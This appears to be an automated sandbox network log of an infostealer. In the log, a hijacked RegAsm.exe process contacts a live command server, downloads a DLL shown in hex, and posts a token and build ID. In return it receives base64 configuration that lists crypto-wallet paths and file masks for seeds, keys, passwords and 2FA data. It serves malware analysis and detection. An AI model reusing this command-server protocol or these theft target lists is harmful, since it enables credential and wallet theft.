2024-09-26 22:28:51 UTC	15605	IN	Data Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f Data Ascii: T@L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	57893	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:52 UTC	193	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:52 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:52 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:28:52 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:28:52 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-09-26 22:28:52 UTC	16384	IN	Data Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MA
2024-09-26 22:28:52 UTC	16384	IN	Data Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-09-26 22:28:52 UTC	16384	IN	Data Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-09-26 22:28:52 UTC	16384	IN	Data Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-09-26 22:28:52 UTC	16384	IN	Data Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-09-26 22:28:52 UTC	16384	IN	Data Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b Data Ascii: d8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$
2024-09-26 22:28:52 UTC	16384	IN	Data Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
2024-09-26 22:28:52 UTC	16384	IN	Data Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff Data Ascii: Y`P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
2024-09-26 22:28:52 UTC	16384	IN	Data Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	57894	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:55 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGCAKKKEGCAKJKFIIEGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 1025 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:55 UTC	1025	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 43 41 4b 4b 4b 45 47 43 41 4b 4a 4b 46 49 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 41 4b 4b 4b 45 47 43 41 4b 4a 4b 46 49 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 41 4b 4b 4b 45 47 43 41 4b 4a 4b 46 49 49 45 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------CGCAKKKEGCAKJKFIIEGIContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------CGCAKKKEGCAKJKFIIEGIContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------CGCAKKKEGCAKJKFIIEGICont
2024-09-26 22:28:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:28:56 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	57895	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:56 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:56 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------ECGHJJEHDHCAAKFIIDGICont
2024-09-26 22:28:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:28:57 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	57896	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:58 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAEHDHDAKJEBGCBKKJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:58 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 48 44 48 44 41 4b 4a 45 42 47 43 42 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 44 48 44 41 4b 4a 45 42 47 43 42 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 44 48 44 41 4b 4a 45 42 47 43 42 4b 4b 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------HCAEHDHDAKJEBGCBKKJEContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------HCAEHDHDAKJEBGCBKKJEContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------HCAEHDHDAKJEBGCBKKJECont
2024-09-26 22:28:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:28:58 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	57897	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:59 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCGCAAKJDHJJJJJKKKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:59 UTC	461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------FHCGCAAKJDHJJJJJKKKFContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------FHCGCAAKJDHJJJJJKKKFContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------FHCGCAAKJDHJJJJJKKKFCont
2024-09-26 22:29:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:29:00 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	57899	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
